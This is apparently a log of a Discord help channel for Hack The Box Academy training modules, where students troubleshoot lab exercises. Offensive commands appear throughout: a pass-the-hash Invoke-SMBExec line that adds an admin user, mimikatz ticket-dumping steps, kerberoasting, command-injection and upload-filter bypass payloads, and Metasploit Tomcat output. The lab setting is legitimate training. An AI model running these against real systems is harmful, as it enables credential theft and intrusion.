#modules

Hello. I need help with SQLmap.

My commands are exactly correct based on the module for cases 8 & 9, but it doesnt retrieve the tables that I need. It even finds the flag table but it doesnt retrieve it ...

Leet. Didn't know nmap would capture the traffic as well... I'll have to try that on the next box I do

Nmap doesn't capture traffic

You just need to capture the traffic during an nmap scan

you can do packet traces

but also HOLY SHIT IS THIS EXPLOIT PISSING ME OFF... a file in the same directory works, while another doesn't

like WTF

what are the module time estimations based on? they feel so short compared to my learning speed and and a path like "SOC Analyst Prerequisites" that estimates 12 days could take me up to a couple months

It could be the way I'm taking notes and memorizing this info which is why I came to ask, what do you guys find helps you remember more of what you read in an efficient manner?

writing down key concepts, doing the module exercises and writing the steps to get the solution

everyone's different though

if you have to rewrite entire sections in your own words, so be it

IIRC the time estimate for the modules is mostly for companies to get an idea of how much time they should expect their employees to take

you should worry more about if you're understanding the content than how long you take to finish the modules though

hello

https://academy.hackthebox.com/module/158/section/1438

Is there something wrong with this module? I think there is a problem when he constructs ptunnel-ng.

try the response to this: https://discordapp.com/channels/473760315293696010/774040263278592041/1157004303983198249

same output

does not work as root either

Need a quick sanity check on the file upload module whitelist/blacklist content. If I'm understanding this correctly, there's two places where an Insecure File Upload could take place; at the web application itself, or through a server misconfiguration. If the web application itself can be tricked into accepting and running your malicious file, game over. However, if the web application doesn't accept the file but the web server does, the attacker would still have to locate and execute that code. Does that sound right?

Can I please DM anyone about the SQLmap Assessment?

are you asking about client-side validation vs server-side validation? in any case, code execution always needs to happen on the server for you to get a shell

🤔 I think I need to go back and re-read some stuff before I ask my question.

Thanks it's very useful, I learned to search history

Is this on your machine or ParrotOS?

Can I please DM anyone about the SQLmap Assessment? I would really appreciate it ... I already got the answer before but I am reviewing and I need help getting it again ...

If anyone is having trouble uploading computers.json data from sharphound use SharpHound v1.0.2

open|filtered If we do not get a response for a specific port, Nmap will set it to that state. This indicates that a firewall or packet filter may protect the port.

I just used the ones that's on C:\tools

https://academy.hackthebox.com/module/113/section/2152

Why is there no content at all?

Wrap the search in quotes

Sometimes egrep is dumb

Also the location of wordlists may have changed in the pwnbox update

Make sure /usr/share/wordlists exists

Also try adding * to /usr/share/wordlists

Such that /usr/share/wordlists/*

Ik -r is recursive

But it could be behaving weirdly

¯_(ツ)_/¯

yes,you are right

For getting started knowledge check, I got to the last step of getting root but then had to do a little googling because it was a different process than what the content covered. Did I miss something where it was explained how ||php|| could be used to escalate?

Gtfobins link

It's in one of the sections

While it wasn't explicitly covered, the resources were provided to you

It also creates something that is not needed

¯_(ツ)_/¯

It's looking for lines that start with transf

So it may be the sed command that's a bit fucked

Got it, thanks that's what I found on google. Was focusing on the cheat sheet too much and didn't realize ALL links in the content were in play

They generally are useful

Am I doing something wrong here with Hashcat?

This is the cmd I used to grab the hash
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user SAPService > sapservice

verify the format and compare it to the expected one

?

try --force or hashcat in your own VM, not attack01

Tried --force, will try in own VM.

Is there anyone that have finished the Advanced SQL injections module ?

Hello

Why does my regsvr32.exe SocksOverRDP-Plugin.dll fail?

force the system to like the files you transfer

https://academy.hackthebox.com/module/113/section/2154 Why did it go wrong?

Can someone guide me how to do Intro to Assembly Language- on windows, every part of this module req to download a file. but what programs to use or how? ty in advance for any guidance.

you tried to make a nreakpoint on the function name : b *SQL... ?

i didn't to do the module but personally i would have done it that way

I am in the NTLM Relay attacks module Ntlmrelayx Use cases section and I had a doubt- why does smbexec work but psexec does not? I am able to get the flag but still I dont understand- aren't they the same except smbexec executes functions one by one whereas psexec spawns an interactive shell?

try whitout the * : b SQL..

did you load the debugging symbols?

It's OK if don't add @

nice

Question regarding the Password Attacks module, Windows Lateral movement section, Pass the Hash with PowerShell Invoke-TheHash (Windows).

It says
Local administrator privileges are not required client-side, but the user and hash we use to authenticate need to have administrative rights on the target computer.

And it shows two ways.One way is to create a new admin user and add it to the local administrators group, which of course requires admin privs as the author mentioned.

Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose

The second way they show is to get a reverse shell

Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "<rev shell command>" -Verbose

Question is, do you need the hash for an account with admin rights for the reverse shell too, or only for creating a new user and adding it to the local admins group ?

I turned off DF but it still doesn't seem to work.

so I haven't done this module but it's similar to the course provided in the cpts. psexec creates a remote service with a name Remcomsvc in the $admin share, then the service is registered via rpc using windows service control manager so I think your user peter doesn't have write access on the $admin share. Unlike smbexec, which doesn't install a service, SMBExec doesn't need to deposit a binary on the target machine or create a service, which makes it useful when write access to ADMIN$ is restricted.

what's the module link?

But this user is an admin on that computer so he should have access to ADMIN$

maybe it's the svc manager that's blocking it, since some anti-virus programs see the RemComSvc executable as a threat.

no, the error says authenticated as guest, aborting so idt thats it

also i checked there is no AV installed

ah so yes guest doesn't have access to the $ADMIN share, that's good to know. i looked on google they say the service is usually blocked when it's created, so that's why i said that

Pls sir can you help me with the correct input syntax I got the answer but it’s not accepting the ans

Hello can anyone help me in DMs about the SQLmap Skill assessment

Check your DMs

No :)

Is it normal for Telnet to just hang and time out on the labs? Because that's what it's about.

You generally shouldn't be connecting with telnet

Especially if secure services are involved you'd use openssl

Pls I need help with answer format to this question in Detecting DCSync/DCShadow of DETECTING WINDOWS ATTACKS WITH SPLUNK

Modify the last Splunk search in this section by replacing the two hidden characters (XX) to align the results with those shown in the screenshot. Enter the correct characters as your answer.

I have gotten the two characters but it’s not accepting it thought that the answer format it’s XX pls I need help for those who have finished CDSA

What sucks about ||IMAP|| is how painfully slow it is to respond.

It's not slow

It's your connection

Also be sure to connect securely

If you suspect a lab isn't behaving properly; restart it

Or change vpn regions and restart it

Tried both. The instant I try to log in as ||tom|| the whole service immediately freezes up.

It shouldn't

Module: Attacking Common Services
Section: Attacking Email Services
I tried smtp-user-enum standalone script with the provided users.list from resources and w/ all methods (VRFY, EXPN and RCPT) for the target.
I got nothing in return.
smtp-user-enum -M <method> -U /path/to/users.list -D inlanefreight.htb -t <target ip> -w 20
Is there something wrong with the syntax?

Okay, workaround. In order to log in I had to ssh -Y into my PwnBox and killall -9 python3 to stop all that outbound traffic which for whatever reason was interfering with the connection.

¯_(ツ)_/¯

I don't mess w/pwnbox much

Better just to use your host directly?

can i get explanation for this question from the pivoting module?
What IP address is used on the attack host to ensure the handler is listening on all IP addresses assigned to the host? (Format: x.x.x.x)

i didnt get what it is asking for

Remote/Reverse Port Forwarding with SSH section

I use my own vm

It's a basic answer

Think of when you do nc -lvnp 8000

What address shows up

oh

ok got it

i just didn't understand the language of the question

I mean what part didn't you understand?

i thought he meant local host

not the zeros one

Localhost is one of the ip addresses assigned

But if you're listening on localhost you aren't necessarily listening on other interfaces

what is the differance between 0.0.0.0 and 127.0.0.1?

0.0.0.0 is a wildcard, if you're listening on 0.0.0.0:22, for instance, any device that shares a network with that device can connect to it on that port

127.0.0.1 is exclusively calls coming from inside the house (itself)

You can open a port on 127.0.0.1 and, without port forwarding, no matter how hard you try you won't be able to reach that port from the outside

is there a way to dump the kerberos keys with Rubeus, similar to mimikatz sekurlsa::ekeyes ? So far I have not found a way to do it

ohhh

yes sir

how ?

https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

Rubeus.exe dump /nowrap

https://book.hacktricks.xyz/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows

it gives it in base64

https://github.com/GhostPack/Rubeus

yes, and when I try to decode it, it;s just gibberish

oh you mean keys not tickets

yes

i was referring to tickets too...

lmaoooo

yeah, I could not find any command to extrac the keys with rubeus, I know you can get them with mimikatz, but I was wondering if it's possible with rubeus

Mimikatz can perform the same base64 .kirbi extraction with the following series of commands:

mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # standard::base64 /output:true
mimikatz # kerberos::list /export
Mimikatz can also carve tickets directly out of LSASS' memory with:

mimikatz # privilege::debug
mimikatz # standard::base64 /output:true
mimikatz # sekurlsa::tickets /export
As "everything is stealthy until someone is looking for it", it's arguable whether LSASS manipulation or ticket extraction via the LsaCallAuthenticationPackage() API call is more "stealthy". Due to Mimikatz' popularity, opening up a handle to LSASS and reading/writing its memory has become a big target for EDR detection and/or prevention. However, LsaCallAuthenticationPackage() is used by a fairly limited set of processes, and creating a fake logon application with LsaRegisterLogonProcess() is also fairly anomalous behavior. However full API level introspection and baselining appears to be a more difficult technical problem than LSASS protection.

that explains it very well, much appreciated

Literally from the documentation

Ctrl+f "keys"

so basically this is impossible then

Well ekeys isn't necessary for that

i mean u can just dump the tickets

^

i mean, if you want to do Overpass The Hash, you cannot only rely on Rubeus

Just doing what's explained in the section

you have to dump the ekeys first with mimikatz

You can arrive at the answer

Password attacks module yeah?

yeah PTT you can rely on Rubeus completely, for Overpass the Hash you need to somehow get the ekeyes first

yes

There should be a technique shown in the section

sorry, a technique for what dumping the ekeys with rubeus ?

You're focusing too hard on ekeys

I only meant to underline that if you want to do PTT you can just use one tool, but if you want to do Overpass-the-Hash, you can do it all with mimikatz, or combine it with Rubeus. It's true the exercise at the end only asks you to perform PTT, but the authors always encourage the students to go beyond

ekeys wasn't mentioned in the section at all, even

from the PTT from windows section

Even still. You can do it with just Rubeus

not for overpass-the-hash

Anyway. Just move on

The dump /nowrap exports tickets in b64

:p but either way

in this module i should execute the reverse shell by connecting to it with the creds in the previous module right?

I believe creds are given to you, no?

i dont know who made the new API module (havent really checked am doing it currently.) but i gotta hand it to him its really well made. like really well made

Like the new web fuzz module?

i think i already did that module

the previous modules i did felt more like copy what i did , recreate it to get the flag etc etc.. this module shows you an example and lets you figure it out by yourself in a different instance if i explained it well

account X has this vulnerability in a certain field then they let u have other credentials to investigate on your own and find the vulnerability by yourself not too far away from the example given. in the section

Yeah. I enjoy the modules where the example differs just enough from the practical

i gotta say its really good, and props for pedant on making the module that way

I thought the same thing 😭

Might as well stay on mimikatz atp

Yeah for the exam for sure, rather keep it simple. Using Rubeus maybe only for evasion which is not the case here. I was looking into ways to dump LSASS remotely and found lsassy tool, not covered in CPTS, but apparently covered in crackmap exec module.

Yeah

Lsadump can do it as well iirc or one of the tools you use to locally dump the sam/system hives

You just use a user/ip

I can't find the best forum for this question, but this is the closes I could find. Does anyone know if the billing section of the academy web app allows one time payments? I have purchased cubes in the best and it seems like I can only pay with my PayPal or add a card to PayPal. Did anyone suscribe with a one time payment without saving the card to the account?

Reach out to support, but afaik your card gets saved, you can reach out to support to unlink your card

I reached to support unfortunately the chat bot says I would get an answer by e-mail in a few hours.

Then nothing you can do about it as the people that ultimately know how billing works is them

Maybe I am wrong, but they show how to dump NTDS.dit, SAM,LSA Secrets remotely, but they do not show how to dump LSASS from memory remotely in any of the modules

Gimme a sec to find it, but iirc it's the pypykatz minidump local

yes, but before you use pypykatz, they show how to create an LSASS dump *locally *

But it may also have been something I read extra about

But if you look into the lsadump tool used for SAM/SYSTEM dump, there should be a way to do remote

As you have to specify that it's local in the command

hmmm could be, it's the secretsdump.py that they show for SAM dump, once you generated and trasferred them

That's what it is

Secretsdump allows for remote dumping with valid [admin] credentials

yeah for sam, ntds.dit, not lsass memory dump

idk what to tell you chief ¯_(ツ)_/¯

Hi, I tried writing on general but it sents me here, what do I do?

Wym

Probably need to verify at #bot-commands

#welcome

Hello I need help with the Command Injections Module (Bypassing).

Nothing works. Not even ip=127.0.0.1%0a{lsa}

Has anyone ever seen THIS happen before?

@shut wraith Which section are you on, friend?

I'm on Bypassing Space Filters of Command Injections

@shut wraith gimme a minute. I'm going to check the module and my notes here.

Mind if I DM you?

Hey all! I'm working through Web Proxies > Repeating Requests. I'm at the point where I just need to find the second flag by trying different requests.

The issue I'm having is when i enter ip=;ls; this works fine but any other request I get a 400 bad request response. Like when I try this ip=;ls ..; I get 400 bad request

If someone could point me in the right direction that would be awesome!

well ls .. isn't gonna execute

try ls ../

or ls /

Thanks @fathom pendant but same issue for both

did you try not having the ; at the end? it's been a hot minute since i touched that

Yup! When I try ip=;ls; it takes a couple seconds and comes back with the correct response. If I try ip=;ls ../; or ip=;ls /; it comes back immediately saying 400 bad request

try respawning the target and recapturing the request

It could be related to the quotes you used, there is a single quote and a double. It seems to just ignore the special character signaling where to fuzz.
edit: sorry i was mistaken about the single quote, it is just your red rectangle hiding the second one.

ok found the issue but not sure what is wrong. Had the same issue but when I updated the original request to update my input of 1 to ;ls; to instead change it to ;ls /; this worked.

When changing it via Open/Resent within zap this worked.

When changing the request with the zap HUD it doesn't want to work with replay in console, but it does work with replay in browser.

i'm stuck on IMAP/POP3 footprinting cannot find credentials to access servers, can anybody help me?

I can help you in a few minutes if someone else isn't available sooner. What have you tried? My DM's are open if you'd prefer that avenue.

thanks, i DMd you

Im in the Windows Priv Esc module in the Situational Awareness section, and I couldnt help but wonder how its possible that Test-AppLockerPolicy says i am denied cmd.exe, yet i am running that application. Can someone help me understand this?

Im guessing that it has something to go with another group policy, but idrk

@fathom pendant can I PM you about the cross-site scripting phishing section? I think I have the payload, but am stuck trying to clean it up. I followed the module

I feel like there's waaay too much yapping in the Penetration Testing Process module, same things are repeated hundreds of times

maybe things are interconnected afterall

Of course they are, but repeated too many times imo

Is this normal?

you're running powershell though?

fair point😂

i suppose the screenshot doesnt help, but i was also able to run commands in cmd.exe

im writing a report using the template from Sysreporter and there is this section "Internal Network Compromise Walkthrough" do i write how i managed to get initial foothold to host A and then I talk about how i went from host A till host B in the detailed walkthrough or what exactly it seems ambiguous to me

quick question about some nmap stuff. how long, on average, does it take you guys to do a -p- scan on a target? i feel like no matter what settings i use it gets to about 30% on the scan then the host starts dropping the probes and nmap increases the sending delay to 1000ms and above. the scan ETA also increases due to this. this only happens when running a -p- scan. is there a flag i can use to decrease this time? really dont want to sit here for 10 minutes for one section page.

Yes, you write everything

I assume you're writing a report based off AEN?

yes

-T4

my go to is sudo nmap -sC -sV -v -p- <target>

i get to the point after it discovers all op[en ports then the delay goes to the roof

ill try -T4...

As a note for this it runs a full scan on all ports, then a script scan on all ports, then a version scan on all ports

yeah that's typically the information i want

i have more than one domain in the active directory so i write how i got initial foothold and moved my way to DC all in two sections on with writing high level steps and one with detailed walkthrough with pictures and stuff

right?

.

do the -Pn, -n, and --disable-arp-ping speed things up at all?

Not really

id send an image if i could... i get the whole "discovered open port" list then just a whole slew of "increasing send delay" messages due to either "max_successful_tryno increase" or "11 out of 11 dropped probes"

At least not to a significant degree

is it kinda one of the things where i just have to suck it up and wait 10 minutes haha

Do a regular port scan that generates a list. Then use that list to do the version and script scans against

alr ill try that

is that correct or i missed something else?

I am unsure why it is doing this, despite following the module

following to the dot in the exercise will not always help you

enumerate a bit the application, take notes and use what you've been taught in the section

adapt and overcome

Can anyone point me into the right direction or tell me how I can locate a file using LFI (local file inclusion)?

?

How you can use?

Ah

looks like whatever you did broke some part of the html code. Might be worth investigating.

Locate a file

It's a lot of guessing tbh

Like with the /…/…/

web applications shouldn't normally do that.

It just depends on what you're looking for

that's file traversal. if that vulnerability is present that's certainly one way of finding it.

Iirc one of the modules goes over file inclusions

I’m looking for flag.txt but don’t know the directory

Ok I will review that

@glass quail root directory

/flag.txt

@fathom pendant correct: https://academy.hackthebox.com/module/details/23

I tried that one i wasn’t able too read it

The question should tell you where it's at basically

First try your payload against /etc/passwd

I did

And did that load?

the question just says Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.

Oh

yes correctly

That's a completely different question

What module are you working on?

I figured it out

hacking wordpress

And if it's a vulnerable plugin, then it's one of the WordPress plug-ins, and files that exists already

Perhaps it's not flag.txt

What section?

test assesment

I thought I had to use a wordpress plug-in to get LFI

The file isn't flag.txt

Utilize the wpscan output

ok thanks

It's unauthenticated file download, not lfi

Completely different things

ooooooh

Can anyone help me with the nmap hard lab please?

Make sure you check your source

alright... I need to take a break.

Thank you

It's more.about the big scans as I wanted to make sure I'm doing what it's asking

The lfi is another question

It shouldn't be "big" scans

But ig idk what you mean by big

Trying to understand the logic behind finding the 3rd service

All port scan

All ports is correct

So it takes about an hour is that how it's meant to be done?

Reread the ids/ips section, and think about "source"

It shouldn't take an hour. Likely you triggered the ids/ips and you're getting blocked

Can I send you my command

No

The command structure is given in the reading

I'm telling you what section it will be in the reading

Read that whole page and try the different methods

Replacing specific ports [-p] with -p-

So i understand what your getting at but it doesnt appear to be working, I am doing -p- but it doesnt return the ports expected

or it takes an hour

Getting NXDOMAIN when attempting to ||dig 134.209.24.248 PTR|| — is there something missing here? And if ||dig|| returns multiple domains, what else can be used to narrow things down?

Module: Information Gathering - Web Edition
Section: Digging DNS

Reset the target, change vpn regions

Also

Ensure you can reach the internet

If you can't reach the internet, you ain't gonna find shit

The problem is too much information, not too little. Dig query is returning 2 domain names, an authority section, and no answer section.

Try dig -x

I cant tell if its bugged or I am completely missing something, it starts me on 50/75 alerts too

Yes, it starts at 50. Also, don't refresh the page — each time you do, the counter increases, as I learned the hard way.

Yeah

That's normal

But if you do it right you barely touch the alerts

Stealth is key for this and setting a source also helps

Yup. Think about what port is impossible to block without screwing up ||everyone's ability to access the Internet.||

That's not necessarily true

Someone can i help me with the last module "assests" on the Api attacks?

no, sorry, I hadn't found the list of words

Hi guys, I'm just starting the 'Password attacks lab - medium' on the pentester job path and the walkthrough says to start with smbmap. Whenever I run smbmap it comes back with nothing. I can nmap and ping the target just fine, I can't work out what I'm missing. Anyone got an idea?

hey does wpscan have the chance of giving different vulnerabilities on different scans because I can't find the unauthorized file download.

when you type smbmap is it installed

yeah, it runs and connects, it just finds nothing

I haven't messed with smbmap maybe try a different walkthrough without the smbmap

Smbmap isn't required, just normal enumeration

Enumerate everything you find :)

hello everyone for the skill assessement of web attack i'm stuck i managed to find the id of the administrator so i modified it in the cookie then then i try to reset the password i get access denied and i don't see how to make an xxe there is no xml field

if anyone has any clues, i'd love to hear them. i was able to analyze the request during the reset, and i tried different http methods to bypass the access denied, but nothing. i'm taking missing parameters.

Tamper with some verbs

Also did you find the t*

There's another element sent with the password reset

yes T_n when I reset the password, I can get it with a get from the api with the uid ending in 2 (I delete the message afterwards) but that's where I get stuck, I get a missing parameters, I don't know why, should I reset to the htb-student uid and enter the admin T_n when I reset... but I don't see the point since I don't need the admin token to reset his password

I'm going to try all the http methods again, I think I've tried them all.

If you have admin t* you can reset admin password

• tries to enumerate discord*

with the uid 74 ?

With the admin uid

well I'd like to lol but it says access denied when in the cookie I have the uid corresponding to admin

And the admin t*

And did you try different verbs? :)

There's several points to consider when resetting, think about all the different places you need

Look where it's requesting

Can I send you a private message to see if you have the same token in your notes, please?

No

It's not hard to GET the token

You can even write a basic script for it

no but the token I saw that I have the admin cookie was just to see if I'm not mistaken

You're not gonna get any new cookies

Just UID and token are the important things here

Pay attention to endpoints as well

But you're close if you know those 2 things

ok I'll try to see with what you told me

Hey guys how are you doin?

I have trying with the getting started for cpts. I type bobs password in but I not able to go further setup keeps failing. I don’t be I doing it wrong

Need help

write section name and what you've tried in detail

@slate zinc

this is what i did

what i write?

you put suff before the command

dont do that

^

Service Scanning
I’ve tried
smbclient -U bob \\10.129.226.128\users

Password: bob:Welcome1

I get session setup failed

@late shell

because his password isn't bob:Welcome1

Oh

whenever that's a credential combination; username:password

whenever you see credentials written out, it'll generally be in the format of user:pass

also don't randomly @ people

they are asking for help regarding something different than you

and much like you, they are also very much a beginner in this field

Sorry I at the wrong person😑 it was a mistake. I know next time. Is this explain in the section? How would I know this?

Thank you

it's general convention

you are told the username is bob; and you see in the reading bob:Welcome1

well if bob is the username, and most passwords don't allow for : when you set them

i need some help with " Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer." footprinting module, got the hash of DBSNMP, but it doesnt work, tried to remove :, tried add the username, crack the hash and put the password but none works..

Hi, i am having issues with one of the CBBH modules, if somebody could help me out, that would be much appreciated!
I am learning the "File Upload Attacks" and when I try to follow the "Whitelist Filters" exercise, I don't get the response that I should get which makes me think that something is broken in that target.
Can somebody try and let me know if it is me or the module that is doing something wrong?

https://academy.hackthebox.com/module/136/section/1289

this one

If you want a sanity check, you can share the value with me and I'll tell you if it just needs more jiggling. DM's are open.

Share in dms or do an md5sum of the pw

You won't get the same response size as the example, if that's what you're wondering

that's not what I mean

the exercise says .jpg.php should work, but that is not the case over here

Don't expect the example to mirror the practical

normally it always does?

#modules message

in this module, the examples offer a simplified version, but provides all the information needed to check and arrive at the answer on your own

ok, than I will try and look for another solution now that I know it's not the machine but me 🙂

thank you

https://academy.hackthebox.com/achievement/221679/17
Thank you for the help was a fun one

a good habit to break out of this mindset is assume the module wouldn't just flat out give you the answer

yes I know, I am trying different things now but the intruder in burpsuite without pro is so slow

it shouldn't take more than like 1 minute to go through

2 big indicators (as shown) is the response size, and the response itself

i have 1760 words and it takes very long for burp to handle the fuzzing 🙂

hi I think I found an issue. I found the right exploit built for tomcat admins and ran it and it will not let me log into server and get shell. I am doing it with metasploit. This is for assessment for shells and payloads. the assessment section is the second to last section. I set the right username and password and now I run exploit. The target must be vulnerable and I set the right port number for the exploit (8080).

msf6 payload(windows/x64/meterpreter_bind_tcp) > search port 8080

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank       Check  Description
   -  ----                                                  ---------------  ----       -----  -----------
   0  exploit/windows/http/hp_imc_java_deserialize          2017-10-03       excellent  Yes    HP Intelligent Management Java Deserialization RCE
   1  exploit/windows/scada/iconics_genbroker               2011-03-21       good       No     Iconics GENESIS32 Integer Overflow Version 9.21.201.01
   2  auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum                   normal     No     Jenkins Server Broadcast Enumeration
   3  auxiliary/scanner/misc/poisonivy_control_scanner                       normal     No     Poison Ivy Command and Control Scanner
   4  exploit/windows/http/solarwinds_fsm_userlogin         2015-03-13       excellent  Yes    Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability
   5  auxiliary/admin/http/tomcat_administration                             normal     No     Tomcat Administration Tool Default Access
   6  exploit/linux/http/trendmicro_websecurity_exec        2020-06-10       excellent  Yes    Trend Micro Web Security (Virtual Appliance) Remote Code Execution
   7  auxiliary/scanner/http/wildfly_traversal              2014-10-22       normal     No     WildFly Directory Traversal


Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wildfly_traversal

msf6 payload(windows/x64/meterpreter_bind_tcp) > use 5
msf6 auxiliary(admin/http/tomcat_administration) > show options

Module options (auxiliary/admin/http/tomcat_administration):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        A proxy chain of format type:host:p
                                           ort[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR iden
                                           tifier, or hosts file with syntax '
                                           file:<path>'
   RPORT        8180             yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing conn
                                           ections
   THREADS      1                yes       The number of concurrent threads (m
                                           ax one per host)
   TOMCAT_PASS                   no        The password for the specified user
                                           name
   TOMCAT_USER                   no        The username to authenticate as
   VHOST                         no        HTTP server virtual host

msf6 auxiliary(admin/http/tomcat_administration) > set RPORT 8080
RPORT => 8080
msf6 auxiliary(admin/http/tomcat_administration) > set RHOSTS 172.16.1.11
RHOSTS => 172.16.1.11
msf6 auxiliary(admin/http/tomcat_administration) > set TOMCAT_PASS s3cret
TOMCAT_PASS => s3cret
msf6 auxiliary(admin/http/tomcat_administration) > set TOMCAT_USER tomcat
TOMCAT_USER => tomcat

sounds like you're using the wrong list then bud

msf6 auxiliary(admin/http/tomcat_administration) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/tomcat_administration) > exploit

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/tomcat_administration) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

i don't recall the php ext list being that long

it runs but does not give a reverse shell

use the php list that the module links :) it saves a lot of headache

just following what the exercise says haha:

"Exercise: Try to add more PHP extensions to the above script to generate more filename permutations, then fuzz the upload functionality with the generated wordlist to see which of the generated file names can be uploaded, and which may execute PHP code after being uploaded."

ah yeah its silly

but iirc the premade list works just fine

bc 1760 words with non-pro intruder takes a while

probably like 30 minutes

yes indeed

if you want you can maybe try the wordlist yoursel and see what the issue is for me? 🙂

also did you make it with all the different php extensions? or just one extension at a time?

:)

if I set VHOSTS what do I make the RHOSTS?

RHOST = IP; VHOST = fqdn such as support.hackthebox.com

I am doing the fuzzing with this wordlist:

for char in '%20' '%0a' '%00' '%0d0a' '/' '.' '.\' '.' '…' ':'; do
for ext in '.php' '.phps' '.php2' '.php3' '.php4' '.php5' '.php6' '.php7' '.pht' '.phtml' '.phar'; do
for ext2 in '.jpg' '.jpeg' '.png' ‘.gif’; do
echo "shell$char$ext$ext2" >> wordlist.txt
echo "shell$ext$char$ext2" >> wordlist.txt
echo "shell$ext2$char$ext" >> wordlist.txt
echo "shell$ext2$ext$char" >> wordlist.txt
done
done
done

yeah that'll do it

don't do a large list

just do a handful of extensions

ok, i'll remove some and see what it does

also as a word to the wise; get in the habit of bracketing your variables

${char}${ext}${ext2}

ok, i'm still learning and this is what the academy gave me 🙂

it ensures that bash only reads the var as that, and not some extra stuff

ik what it gave you

and this is what i'm telling you

cool, thx for the tip!

that way in the future if you decide to do something like $var_filename

var=foo

it won't say foo_filename

i see! 😄

great tip

because it treats the whole thing as the var

what's wrong with options here?

msf6 auxiliary(admin/http/tomcat_administration) > show options

Module options (auxiliary/admin/http/tomcat_administration):

   Name         Current Setting      Required  Description
   ----         ---------------      --------  -----------
   Proxies                           no        A proxy chain of format type:ho
                                               st:port[,type:host:port][...]
   RHOSTS       status.inlanefreigh  yes       The target host(s), range CIDR
                t.local                        identifier, or hosts file with
                                               syntax 'file:<path>'
   RPORT        8080                 yes       The target port (TCP)
   SSL          false                no        Negotiate SSL/TLS for outgoing
                                               connections
   THREADS      1                    yes       The number of concurrent thread
                                               s (max one per host)
   TOMCAT_PASS  s3cret               no        The password for the specified
                                               username
   TOMCAT_USER  tomcat               no        The username to authenticate as
   VHOST        172.16.1.11          no        HTTP server virtual host

I know there is something misconfigured here

${var}_filename

shells and payload module? that doesn't look to be the right user and pass

I thought it was because when I go to the website at 172.16.1.11:8080 and try to log in then login fails and I hit cancel it shows a page that lists those creds

shold I try without any username and password?

this is for question 2

shells and payloads yeah?

ya the assessment section

look at the desktop of the jump host you're given 😄

ok

its something like 90% of people overlook (including myself) LOL

literally super easy to not think about

but it was there the whole time

hold on wait

no ya I don't know

its really weird I don't get why this won't work

🥹

question

are you on the jump host running msfconsole?

I was doing http verb wrong and changing it manually instead of using the burp option

because the creds on the jump host desktop do work

let burp do the hard work for you

yes

second question did you set the LHOST to the right interface

I swear lol😭 🤣

hold on let me check

it should match the first 2 octets of the target you're trying to pwn

172.x.x.x

there's no LHOST option in this exploit

but the port is set to 8080 and originally the exploit used 8180

RPORT I mean

am I using wrong exploit?

VHOST is set to target VHOST

¯_(ツ)_/¯

though i don't recall using msfconsole for tomcat stuff

i just used msfvenom for the payload and set up a listener

it was way easier

ok

I mean I could try it

it'll be easier than trying to figure out and troubleshoot msfconsole

ok thanks I will start work on it tonight

I gotta go now but ya I will get to work on that

I'm gonna take a break for now then

ya that would explain why what I'm doing isn't working

anyway I gotta go

I'll ttyl next time I need help

I ought to try it right way before I immediately ask for help so I will review msfvenom

anyway peace out

this is getting me nowhere 😓

don't use the scripted extensions, just use the basic php list provided it contains some double extensions in it as well

i did that in the beginning of the exercise, there I only got a valid upload message with these:

but they are not running any PHP

these are only just uploading simple .jpg, .png and .gif files with filename x00

you should be getting more

gimme a moment

that's what i've been saying, i thought i would get .php.jpg also, but it seems that its not the case for me

make sure you check the response as well for all of them

not just the size

yes i know

where I would like to get "File successfully uploaded", I am getting "Extension not allowed"

did you disable the url encoding?

yes

when you found the .php.jpg did you replace the whole thing with the payload selection or just the .php

:) i suggest only looking for the replacement for ||.php||

what do you mean? i don't follow sorry

have your payload only ||replace the .php part of .php.jpg||

and use the php list from the PayloadAllTheThings repo

this is my payload in burpsuite, if you mean that?

------WebKitFormBoundaryLpXa6RzSZUdAW0Hk
Content-Disposition: form-data; name="uploadFile"; filename="shell§.png§"
Content-Type: image/png

<?php echo 'hello world'; ?>

------WebKitFormBoundaryLpXa6RzSZUdAW0Hk--

i am replacing ".png"

Quick Question: When you ssh to a target, and it asks for you password, are you using the password that's in the "my_credentials.txt" file? Because in the Linux Fundamentals course, in small print, it says,

"SSH to with user "htb-student" and password "HTB_@cademy_stdnt!"

You need a ||double extension that works first||

Or at least that gives a different error

i believe that file contains the credentials for your pwnbox instance

The mycredentials is for your pwnbox if you wish to ssh into it from another machine

like this one? #modules message

okay. Because when I use the "HTB_@cademy_stdnt!" password, it says, "Permission denied, please try again." Weird.

ssh htb-student@ip

Only images allowed from what I recall

For section PKI-ESC 1 in windows attack & defense module whenever I try to authenticate to the box with logs, PKI (172.16.18.15) I get this^

Can you try to ssh to it?

yeah but its just stagnate

Rdp might not be enabled for that machine

You mean slow or freezes?

Have you tried using the tcp vpn

I've been on pwnbox so far so I haven't tried tcp vpn, I don't know if slow or freezes I ran it again to make sure I didn't kill the command prematurely

Ah

Pwnbox is slightly different

From what I've heard sometimes it's just slow

Other alternatives include changing vpn region (yes it can matter)

Upon ssh I got connection timed out

And changing pwnbox region

i honestly think this exercise is broken

nothing is working for me

i give up for today and will try again later i guess...

thanks for trying to help though @fathom pendant and @storm elk 👋

Nah, not broke

Create the XOR ciphertext of the password 'opens3same' using the key 'academy'. (Answer format: \x00\x00\x00....) I have the answer I think, but I'm not sure how to format it. Can anyone help?

